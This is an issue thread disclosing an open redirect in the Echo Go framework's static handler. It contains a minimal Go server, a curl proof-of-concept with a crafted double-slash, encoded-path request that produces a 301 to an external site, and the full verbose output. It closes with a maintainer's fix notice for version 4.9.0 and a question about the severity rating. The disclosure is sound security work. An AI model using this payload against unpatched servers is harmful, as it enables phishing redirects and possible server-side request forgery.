vulnerability: open redirect in static handler

[ruokeqx]

Issue Description

301 redirect and may further cause ssrf

see:
go-macaron/macaron#198

also see:
diango CVE-2018-14574

package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}

D:\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f..
*   Trying 127.0.0.1:1323...
* Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0)
> GET //ruokeqx.gitee.io%2f.. HTTP/1.1
> Host: 127.0.0.1:1323
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Location: //ruokeqx.gitee.io/../
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Length: 0
<
* Connection #0 to host 127.0.0.1 left intact
* Clear auth, redirects to port from 1323 to 80
* Issue another request to this URL: 'http://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:80...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1)
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 04 Sep 2022 18:47:03 GMT
< Content-Type: text/html
< Content-Length: 182
< Connection: keep-alive
< Server: openresty
< Location: https://ruokeqx.gitee.io/
< Expires: Mon, 05 Sep 2022 18:47:03 GMT
< Cache-Control: max-age=86400
<
* Ignoring the response-body
* Connection #1 to host ruokeqx.gitee.io left intact
* Clear auth, redirects to port from 80 to 443
* Issue another request to this URL: 'https://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:443...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server accepted http/1.1
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* schannel: failed to decrypt data, need more data
* schannel: failed to decrypt data, need more data
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Type: text/html
< Content-Length: 94632
< Connection: keep-alive
< Server: openresty
< Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT
< ETag: "6314e525-171a8"
< Expires: Mon, 05 Sep 2022 18:47:04 GMT
< Cache-Control: max-age=86400
< Accept-Ranges: bytes
<
<!DOCTYPE html>
...

[aldas]

This is fixed in (just now released) version 4.9.0

[aldas]

@ruokeqx Thank you for reporting this.

[marcelo321]

How is this critical? is looks like a normal open redirect with code 301. I don't see how can this be escalated to critical severity, can anyone enlighten me please? @ruokeqx